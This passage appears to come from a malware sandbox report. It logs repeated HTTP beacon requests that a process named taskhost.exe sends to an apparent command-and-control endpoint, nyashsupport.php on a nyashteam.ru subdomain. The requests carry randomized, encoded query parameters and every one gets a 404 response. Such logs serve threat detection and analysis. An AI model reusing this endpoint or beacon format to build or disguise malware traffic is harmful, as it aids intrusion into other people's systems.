                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?s3ZMM5OVEspS2pteXf4QibBGVN=duVIMfT0m2XS&MsCyEfh=W70ByRPR&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&s3ZMM5OVEspS2pteXf4QibBGVN=duVIMfT0m2XS&MsCyEfh=W70ByRPR
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?s3ZMM5OVEspS2pteXf4QibBGVN=duVIMfT0m2XS&MsCyEfh=W70ByRPR&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&s3ZMM5OVEspS2pteXf4QibBGVN=duVIMfT0m2XS&MsCyEfh=W70ByRPR HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/javascript
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                              Host: 81888.cllt.nyashteam.ru
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:02:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ke4vkyIfTe1WNQFHUrZjclQqclmd7YsI6qBC6WOFMkPVr8TWh%2FIl7RNnGT4EdNe9s%2FHBEGG%2F8TA%2FnuOew8hj%2BAIutsxwjMunpm5bp41TPnWZp3efmTU25wyl5RKLs3so9oyS4499V%2BzP6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90f06a3d594176-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26520&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1004&recv_bytes=1034&delivery_rate=103288&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?O5=74qraxQeRbgjV2&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&O5=74qraxQeRbgjV2
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?O5=74qraxQeRbgjV2&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&O5=74qraxQeRbgjV2 HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/html
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                              Host: 81888.cllt.nyashteam.ru
                                              Connection: Keep-Alive
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:02:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eX68w7RKojiMx1EbvDw7%2FfHgeQlHTjH8IZyFdrRoUoG9oZElsn8Q%2FfSL5kmpyjXeSjOMs8BdT5Xe4rhOhwDt0XOA05ZahfxC9%2FUN5133FlmgXt8VDh4qtnyuIAAF8BjXqh8BEWyou7R5kA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90f0a9e84bedee-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=25972&min_rtt=25972&rtt_var=12986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=444&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?O5=74qraxQeRbgjV2&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&O5=74qraxQeRbgjV2
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?O5=74qraxQeRbgjV2&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&O5=74qraxQeRbgjV2 HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/html
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                              Host: 81888.cllt.nyashteam.ru
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:02:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=stJ7xxXn1SFyq7qZ68tCxx%2FEsEOyHUdw2lRAzQVdvmSRjuVG60Ai%2Bb9%2FnUrMAV83EgQCGqr%2B5Bku%2Fssj1MbkJlCRjObsdxxNzdxv9CSfJ2Tb%2B31nFj%2BowKfRQ00ClFHlIB0ZqZJl8WmeeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90f0aabaf0edee-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26035&min_rtt=25972&rtt_var=9865&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1030&recv_bytes=864&delivery_rate=102504&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK HTTP/1.1
                                              Accept: */*
                                              Content-Type: application/json
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                              Host: 81888.cllt.nyashteam.ru
                                              Connection: Keep-Alive
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:02:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Q9apWkCConOfV2NOXpND0CbeuoeEdrQwmvv3VB%2FA0gvhE9o7F2vLhn%2Fo1OpARaxtU4SsqKxEuFnoZ8ELu4KKFHFdcDwEUKqIncpJBrCFPN49861rkjoOGRBJ%2FxVniRDvRiYqyWDZ3QuGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90f0e2cc4d636a-LHR
                                              alt-svc: h2=":443"; ma=60
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26149&min_rtt=26149&rtt_var=13074&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=572&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK HTTP/1.1
                                              Accept: */*
                                              Content-Type: application/json
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                              Host: 81888.cllt.nyashteam.ru
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:02:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dC4dP8KPtGMrrI94g2rc5ZPk7Fv31K7SFVYRqwB%2B1zoxdf50h2S%2FAPlc4Ag4rRwRf%2Fp7a28W7%2FOZjmzv8TP5q2eQME9OqM2awjV75CH54NEsDv7CAQatonuS%2BbT5fRnfDrmizXPxMEGu7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90f0e3dd81636a-LHR
                                              alt-svc: h2=":443"; ma=60
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26163&min_rtt=26140&rtt_var=9835&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1027&recv_bytes=1120&delivery_rate=103331&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?H9M6ijfuT12g7tVu=DVte0InybVvv8evR6XBmkvuVa&7eNbL3vnrTy9R=jIGOu8UWGPAVTILRkXDdLIlAJ1A&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&H9M6ijfuT12g7tVu=DVte0InybVvv8evR6XBmkvuVa&7eNbL3vnrTy9R=jIGOu8UWGPAVTILRkXDdLIlAJ1A
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?H9M6ijfuT12g7tVu=DVte0InybVvv8evR6XBmkvuVa&7eNbL3vnrTy9R=jIGOu8UWGPAVTILRkXDdLIlAJ1A&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&H9M6ijfuT12g7tVu=DVte0InybVvv8evR6XBmkvuVa&7eNbL3vnrTy9R=jIGOu8UWGPAVTILRkXDdLIlAJ1A HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/css
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                              Host: 81888.cllt.nyashteam.ru
                                              Connection: Keep-Alive
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:02:58 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lOS1xYiAWaZcFDaRwX56qkd1DQL9sLxFs2PjssLBMW5cTurvd9PzH9ZlEyrGX0ccDJ5KLNORxD%2BPU5zf7tmVRsY%2F0Rpd1SGCooMtsKfc9Lg0YQsHniETStX6U4h1gVSnsDpisyT4briGaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90f1408dffcd45-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26046&min_rtt=26046&rtt_var=13023&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=577&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?H9M6ijfuT12g7tVu=DVte0InybVvv8evR6XBmkvuVa&7eNbL3vnrTy9R=jIGOu8UWGPAVTILRkXDdLIlAJ1A&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&H9M6ijfuT12g7tVu=DVte0InybVvv8evR6XBmkvuVa&7eNbL3vnrTy9R=jIGOu8UWGPAVTILRkXDdLIlAJ1A
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?H9M6ijfuT12g7tVu=DVte0InybVvv8evR6XBmkvuVa&7eNbL3vnrTy9R=jIGOu8UWGPAVTILRkXDdLIlAJ1A&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&H9M6ijfuT12g7tVu=DVte0InybVvv8evR6XBmkvuVa&7eNbL3vnrTy9R=jIGOu8UWGPAVTILRkXDdLIlAJ1A HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/css
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                              Host: 81888.cllt.nyashteam.ru
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:02:58 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TPJtOzaI1Y9UHH4yg38Miv18mnk0O%2F4vY9gf5P%2FmlLFWRMVe0h2um6uvKkoI1pXOKaBrvRPLF%2BpWXyqZYPinV8272niR92Fsq4Evb1zjLlx3OlhAIMLvvxT3Tcn6AfNu3HN9EEJh592qeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90f1419eeecd45-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26281&min_rtt=26046&rtt_var=10238&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1028&recv_bytes=1130&delivery_rate=97171&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?K6Mtes2juD=xCKYXP3qS&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1EGMwYDZiNzNjN2Y4ITYxImN2QTZ5AzY0MTYhRWZzIzMkVGMhZTN&K6Mtes2juD=xCKYXP3qS
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?K6Mtes2juD=xCKYXP3qS&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1EGMwYDZiNzNjN2Y4ITYxImN2QTZ5AzY0MTYhRWZzIzMkVGMhZTN&K6Mtes2juD=xCKYXP3qS HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/javascript
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                              Host: 81888.cllt.nyashteam.ru
                                              Connection: Keep-Alive
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:03:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6bcvV7SW13vcpqIcS4ZtYyfjRlXr7S4KQ8RcPaIhRMrNTQGAG9Ijw78m7%2Fngu52bgLRghkkFtvCvj4z61W5PFBmxht7ZZMKP4Mhq9lO4MubLCcslSQIia6qLO3kJG9qcAIgmoZKGnx33JQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90f18aa8da385b-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=25931&min_rtt=25931&rtt_var=12965&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=474&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?K6Mtes2juD=xCKYXP3qS&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1EGMwYDZiNzNjN2Y4ITYxImN2QTZ5AzY0MTYhRWZzIzMkVGMhZTN&K6Mtes2juD=xCKYXP3qS
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?K6Mtes2juD=xCKYXP3qS&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1EGMwYDZiNzNjN2Y4ITYxImN2QTZ5AzY0MTYhRWZzIzMkVGMhZTN&K6Mtes2juD=xCKYXP3qS HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/javascript
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                              Host: 81888.cllt.nyashteam.ru
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:03:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CdQDrZ1yEL2rSwq5XrsVe3f5Zu2FyVuKKnWEsmrBTuQnPothcqNk0IyTBGpd0JUt9xvh1YcOpvpZcU071PBn2xTWoCpY6xxwa6jpjDdfU8y8EGYL6%2F5DnyvFab3uyLMnXrJNigh9n1EnCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90f18b99e1385b-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=26097&min_rtt=25931&rtt_var=7594&sent=5&recv=5&lost=0&retrans=0&sent_bytes=1026&recv_bytes=924&delivery_rate=150833&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?2XFmvyjR8=HEc6WH18BjCsRF&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&2XFmvyjR8=HEc6WH18BjCsRF
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?2XFmvyjR8=HEc6WH18BjCsRF&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&2XFmvyjR8=HEc6WH18BjCsRF HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/html
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                              Host: 81888.cllt.nyashteam.ru
                                              Connection: Keep-Alive
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:03:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2B7hCmf99b7BzPJrBcN87Qu%2FcLY8vAXTobmNapoiA3k4rm9JA%2BVlHUFEZslVZ%2FC%2Bm%2FV1eBMzAg85fWXl%2BmxcGO5qGa5WLDpqCsifSXMHmrrpMSnKyT11ZZr57gQxyjU%2Bn31f3SJrXsqWjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90f1bcbe48ed07-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=25814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=458&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • flag-us
                                              GET
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?2XFmvyjR8=HEc6WH18BjCsRF&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&2XFmvyjR8=HEc6WH18BjCsRF
                                              taskhost.exe
                                              Remote address:
                                              104.21.2.8:80
                                              Request
                                              GET /nyashsupport.php?2XFmvyjR8=HEc6WH18BjCsRF&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&2XFmvyjR8=HEc6WH18BjCsRF HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/html
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                              Host: 81888.cllt.nyashteam.ru
                                              Response
                                              HTTP/1.1 404 Not Found
                                              Date: Wed, 27 Nov 2024 09:03:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kzWHlg0oejirgIO3sfXxwb%2FOEt5fI8qrsstnMJsHF%2FxuctrvOmDZRU0SybKSlWFnXH9hAS6AoN9NBDTgdjQgjjcMC88CbojWI2qG%2BC4QYJisvwZy1%2BFUh%2BZ7VO6wgzewjouxsIhdfrs%2F4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8e90f1bdc9e6ed07-LHR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=25880&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1012&recv_bytes=892&delivery_rate=103002&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            • 104.21.2.8:80
                                              http://81888.cllt.nyashteam.ru/nyashsupport.php?iGXUH0kg8uq=FZo8eJzSA&LkB8c43UXygj4hVTF=u4PXnHP1NH&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&iGXUH0kg8uq=FZo8eJzSA&LkB8c43UXygj4hVTF=u4PXnHP1NH
                                              http
                                              taskhost.exe
                                              1.2kB
                                              2.4kB
                                              7
                                              8

                                              HTTP Request

                                              GET http://81888.cllt.nyashteam.ru/nyashsupport.php?iGXUH0kg8uq=FZo8eJzSA&LkB8c43UXygj4hVTF=u4PXnHP1NH&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&iGXUH0kg8uq=FZo8eJzSA&LkB8c43UXygj4hVTF=u4PXnHP1NH

                                              HTTP Response

                                              404

                                              HTTP Request

                                              GET http://81888.cllt.nyashteam.ru/nyashsupport.php?iGXUH0kg8uq=FZo8eJzSA&LkB8c43UXygj4hVTF=u4PXnHP1NH&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gM5UzN0IjNiJ2N4UGNklDMkZTMjZzY0czN5MWOiJ2Y2QDO3YWNlFWO&iGXUH0kg8uq=FZo8eJzSA&LkB8c43UXygj4hVTF=u4PXnHP1NH

                                              HTTP Response

                                              404
                                            • 104.21.2.8:80
